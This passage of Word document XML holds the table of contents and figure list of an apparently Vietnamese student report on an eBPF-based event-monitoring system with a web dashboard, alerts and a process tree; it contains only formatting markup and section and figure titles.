          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc215810138 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>16</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0"/>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_Toc2046934737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5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Đánh giá</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2046934737 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18</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_Toc1313647928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5.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Ưu điểm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1313647928 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18</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_Toc1334559119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5.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Khuyết điểm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1334559119 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18</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_Toc2095054617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5.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Hướng phát triển</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2095054617 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19</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0"/>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_Toc1041620708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6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Demo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1041620708 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19</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_Toc541391065 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Các cửa sổ chính</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc541391065 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19</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21"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9052"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc924354500 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Hướng dẫn cài đặt và sử dụng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc924354500 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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Cs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="18"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Danh mục </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Hình</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9052"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:instrText xml:space="preserve">TOC \h \c "Figure"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc260392647 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Cây phân rã chức năng</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc260392647 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>8</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_Toc132941189 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Lưu đồ xử lý tổng thể</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc132941189 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>9</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_Toc474696696 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Lưu đồ xử lý eBPF Agent</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc474696696 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>11</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_Toc769230564 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Lưu đồ thu thập và chuẩn hóa dữ liệu</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc769230564 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>12</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_Toc1032018834 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: lưu đồ xử lý của Logger</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1032018834 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>13</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_Toc1251950071 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Lưu đồ xử lý thành phần mở rộng</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1251950071 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>17</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_Toc893575897 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - giao diện web</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc893575897 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>19</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_Toc1624649147 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo-giao diện chính của hệ thống</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1624649147 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>20</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_Toc218585403 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - thành phần live events</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc218585403 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>20</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_Toc674138236 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - thành phần Alerts View</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc674138236 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>21</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_Toc675404875 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - thành phần event detail</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc675404875 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>21</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_Toc761102534 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - thành phần process tree</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc761102534 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>22</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_Toc581655418 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 13 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: demo - thành phần mở rộng</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc581655418 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>22</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_Toc1440706563 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">: chạy script </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1440706563 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>22</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_Toc588875189 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: hướng dẫn cài đặt 1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc588875189 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>23</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_Toc1756970612 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: hướng dẫn cài đặt 2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1756970612 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9052"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1993512491 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: hướng dẫn cài đặt 3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1993512491 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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bookmarkStart w:id="97" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="97"/>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pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="11909" w:h="16834"/>
